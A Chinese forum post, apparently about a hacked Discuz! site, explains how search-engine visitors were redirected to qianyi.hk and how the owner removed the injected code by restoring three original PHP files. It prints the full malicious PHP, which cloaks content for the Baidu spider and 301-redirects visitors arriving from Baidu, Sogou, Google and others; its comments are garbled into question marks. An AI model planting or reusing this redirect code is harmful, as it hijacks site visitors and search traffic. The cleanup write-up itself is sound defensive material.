网站百度搜索结果被qianyi.hk挂马跳转后的解决办法

症状分析：
1、直接输入域名访问论坛无任何异常和问题，查看源码也看不到异常代码；
2、但百度搜索论坛后，点击搜索结果就自动会跳转到一个www.qianyi.hk的违法网站；

清除木马步骤：

1、经过对论坛所有文件进行比对查询后，发现以下三个文件被加入了木马：

/source/function/function_forum.php
/source/function/function_home.php
/source/function/function_portal.php

具体的木马代码如下：

1. <?php
   
2. ################################################
   
3. # ??????????inc?include?????? #
   
4. #    ??require_once('?????');????   #
   
5. #                ???????                #
   
6. ################################################
   
7. if (ereg("http://www.baidu.com/search/spider.htm", $_SERVER["HTTP_USER_AGENT"])) {
   
8.         //?????????????????????
   
9. /*
   
10. Header("HTTP/1.1 301 Moved Permanently");
    
11. Header("Location: http://www.zg909.com/");
    
12. //??301???301???????????????????????????URL???...
    
13. */
    
14. $file = file_get_contents('http://www.qianyi.hk/');
    
15. echo $file;//????????
    
16. exit;
    
17. }
    
18. //????  
    
19. if(stristr ($_SERVER['HTTP_REFERER'],"baidu.com")) {//??????baidu.com
    
20. Header("HTTP/1.1 301 Moved Permanently");//301????????301??????301?????????????
    
21. Header("Location: http://www.qianyi.hk/");//??
    
22. exit;
    
23. }
    
24. if(stristr ($_SERVER['HTTP_REFERER'],"soso.com")) {//??????baidu.com
    
25. Header("HTTP/1.1 301 Moved Permanently");//301????????301??????301?????????????
    
26. Header("Location: http://www.qianyi.hk/");//??
    
27. exit;
    
28. }
    
29. if(stristr ($_SERVER['HTTP_REFERER'],"so.com")) {//??????baidu.com
    
30. Header("HTTP/1.1 301 Moved Permanently");//301????????301??????301?????????????
    
31. Header("Location: http://www.qianyi.hk/");//??
    
32. exit;
    
33. }
    
34. if(stristr ($_SERVER['HTTP_REFERER'],"sogou.com")) {//??????baidu.com
    
35. Header("HTTP/1.1 301 Moved Permanently");//301????????301??????301?????????????
    
36. Header("Location: http://www.qianyi.hk/");//??
    
37. exit;
    
38. }
    
39. if(stristr ($_SERVER['HTTP_REFERER'],"google.com")) {//??????baidu.com
    
40. Header("HTTP/1.1 301 Moved Permanently");//301????????301??????301?????????????
    
41. Header("Location: http://www.qianyi.hk/");//??
    
42. exit;
    
43. }
    
44. ?>

复制代码

从代码可以看出来，为什么我们百度搜索结果点击后会跳转到这个垃圾网站了，现在要做的，就是用dz的源文件，覆盖掉这几个文件即可。

什么原因下会被挂马？
是空间被入侵？还是DZ本身漏洞呢？

hong5305 发表于 2013-12-24 16:49
什么原因下会被挂马？
是空间被入侵？还是DZ本身漏洞呢？

具体被攻击的原因暂时未查明。现在还不能肯定是dz本身的漏洞，如果dz有明显漏洞，估计很多人都中招了